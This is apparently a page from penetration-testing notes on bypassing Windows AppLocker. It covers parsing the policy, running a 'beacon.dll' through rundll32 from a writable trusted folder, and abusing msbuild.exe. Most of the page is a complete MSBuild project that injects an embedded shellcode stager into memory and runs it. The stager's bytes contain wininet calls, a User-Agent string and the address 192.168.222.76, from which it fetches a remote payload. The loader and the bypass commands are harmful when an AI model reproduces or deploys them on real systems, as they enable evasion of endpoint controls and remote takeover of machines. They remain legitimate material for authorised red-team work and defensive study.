AppLocker

# https://github.com/PowerShell/GPRegistryPolicyParser
# Parse AppLocker Policy
Import-Module .\GPRegistryPolicyParser.psm1
Parse-PolFile -Path "\\marvel.local\sysvol\MARVEL.local\Policies\{FFA03B11-A48D-4B85-BC64-6E434DB8B7B2}\Machine\Registry.pol"

Default Rules Bypass:

Executing untrusted code via trusts LOLBAS's.
Finding writeable directories within "trusted" paths.
By default, AppLocker is not even applied to Administrators.

# Search For Writable Paths By Normal Users
C:\Windows\Tasks\*

# Run through DLL
C:\Windows\System32\rundll32.exe C:\Windows\Tasks\beacon.dll,StartW

MSBUILD (Bypass2)

# LOLBAS (https://lolbas-project.github.io/)
msbuild.exe shell.xml

C# Code Inside XML (Bypass2 Cont.)

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
         <!-- This inline task executes shellcode. -->
         <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
         <!-- Save This File And Execute The Above Command -->
         <!-- Author: Casey Smith, Twitter: @subTee -->
         <!-- License: BSD 3-Clause -->
	  <Target Name="Hello">
	    <ClassExample />
	  </Target>
	  <UsingTask
	    TaskName="ClassExample"
	    TaskFactory="CodeTaskFactory"
	    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	    <Task>
	    
	      <Code Type="Class" Language="cs">
	      <![CDATA[
		using System;
		using System.Runtime.InteropServices;
		using Microsoft.Build.Framework;
		using Microsoft.Build.Utilities;
		public class ClassExample :  Task, ITask
		{         
		  private static UInt32 MEM_COMMIT = 0x1000;          
		  private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;          
		  [DllImport("kernel32")]
		  private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
		  UInt32 size, UInt32 flAllocationType, UInt32 flProtect);          
		  [DllImport("kernel32")]
		    private static extern IntPtr CreateThread(            
		    UInt32 lpThreadAttributes,
		    UInt32 dwStackSize,
		    UInt32 lpStartAddress,
		    IntPtr param,
		    UInt32 dwCreationFlags,
		    ref UInt32 lpThreadId           
		    );
		  [DllImport("kernel32")]
		  private static extern UInt32 WaitForSingleObject(           
		    IntPtr hHandle,
		    UInt32 dwMilliseconds
		    );          
		  public override bool Execute()
		  {
		    //replace with your own shellcode
		    byte[] shellcode = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x40, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x69, 0x6d, 0x61, 0x67, 0x65, 0x33, 0x32, 0x2e, 0x67, 0x69, 0x66, 0x00, 0xbd, 0x12, 0x57, 0x44, 0x54, 0xcc, 0xf9, 0x59, 0x98, 0xc3, 0xa2, 0x58, 0x66, 0xd7, 0xe1, 0xf4, 0xf2, 0xcb, 0x99, 0xb0, 0x60, 0x5c, 0x82, 0x97, 0xf7, 0x36, 0xc6, 0x70, 0x03, 0x74, 0x71, 0x31, 0x73, 0x4b, 0xde, 0xa8, 0x04, 0xcc, 0xc5, 0x50, 0xc3, 0x1f, 0xd5, 0x95, 0xae, 0x94, 0xde, 0x6c, 0xc5, 0xc9, 0x8d, 0xcf, 0xa3, 0x4b, 0x73, 0x43, 0x7b, 0xd2, 0xd6, 0x0f, 0xed, 0xea, 0x02, 0xde, 0xbf, 0x0d, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x72, 0x76, 0x3a, 0x38, 0x39, 0x2e, 0x30, 0x29, 0x20, 0x47, 0x65, 0x63, 0x6b, 0x6f, 0x2f, 0x32, 0x30, 0x31, 0x30, 0x30, 0x31, 0x30, 0x31, 0x20, 0x46, 0x69, 0x72, 0x65, 0x66, 0x6f, 0x78, 0x2f, 0x38, 0x39, 0x2e, 0x30, 0x0d, 0x0a, 0x00, 0x2c, 0x9d, 0x25, 0x4d, 0x5b, 0xdd, 0xe4, 0x73, 0xb5, 0x48, 0xd7, 0x62, 0x8f, 0x90, 0xc1, 0x4f, 0x39, 0x64, 0x4c, 0xd1, 0x92, 0xaa, 0xd2, 0x53, 0x71, 0x52, 0xe4, 0x20, 0x23, 0x63, 0x4d, 0x91, 0x5f, 0xfc, 0x30, 0x62, 0xc2, 0xcf, 0xa0, 0x00, 0x13, 0x89, 0xdd, 0x45, 0xc9, 0x3f, 0x48, 0x93, 0xa8, 0x0e, 0x69, 0xd6, 0x11, 0x7e, 0xf0, 0x84, 0x96, 0xbb, 0xaf, 0x8a, 0xd2, 0x37, 0x32, 0x63, 0x2c, 0x36, 0x37, 0xd1, 0x07, 0x63, 0x26, 0xcc, 0xe8, 0x02, 0x2e, 0xa5, 0x3e, 0x13, 0xfc, 0x64, 0x7e, 0xf2, 0x19, 0x4d, 0x56, 0x74, 0x0f, 0x24, 0x87, 0x2c, 0xb8, 0x1b, 0x40, 0xd9, 0x3a, 0xbd, 0xab, 0xa3, 0x32, 0xdd, 0x95, 0x43, 0x9c, 0x78, 0xbe, 0x0c, 0xd3, 0xd5, 0x34, 0xc1, 0xed, 0x66, 0x60, 0x4f, 0x5f, 0xbd, 0x5b, 0xd0, 0x75, 0x3c, 0x06, 0x27, 0x60, 0x88, 0xbc, 0xa5, 0x9a, 0xd8, 0x7f, 0x62, 0x10, 0xb8, 0xa5, 0xb9, 0xcd, 0xd3, 0x15, 0x2c, 0xe1, 0xad, 0xb4, 0xd7, 0x54, 0x46, 0xa4, 0x37, 0x95, 0xea, 0x9b, 0x15, 0xb4, 0xaf, 0xea, 0x93, 0x49, 0x6b, 0xe8, 0x50, 0xc7, 0x16, 0x87, 0xed, 0x2b, 0x99, 0xdb, 0x03, 0x6f, 0xb7, 0x29, 0xf0, 0xdb, 0x69, 0x1b, 0xa8, 0xb0, 0xe0, 0x85, 0x19, 0x34, 0x42, 0xb4, 0x12, 0xd6, 0x68, 0x26, 0x13, 0x04, 0x2c, 0xe1, 0xb3, 0x6b, 0xc6, 0x73, 0x92, 0xb7, 0x15, 0x26, 0xb9, 0x11, 0x11, 0xf4, 0x51, 0xe2, 0x35, 0x3a, 0x73, 0xe7, 0xbc, 0xd7, 0x31, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x28, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x32, 0x32, 0x32, 0x2e, 0x37, 0x36, 0x00, 0x12, 0x34, 0x56, 0x78 };
		      
		    UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
		    IntPtr hThread = IntPtr.Zero;
		    UInt32 threadId = 0;
		    IntPtr pinfo = IntPtr.Zero;
		    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
		    WaitForSingleObject(hThread, 0xFFFFFFFF);
		    return true;
		  }
		}   
	      ]]>
	      </Code>
	    </Task>
	  </UsingTask>
	</Project

PreviousLAPS NextPowerShell Constrained Mode

Last updated 3 years ago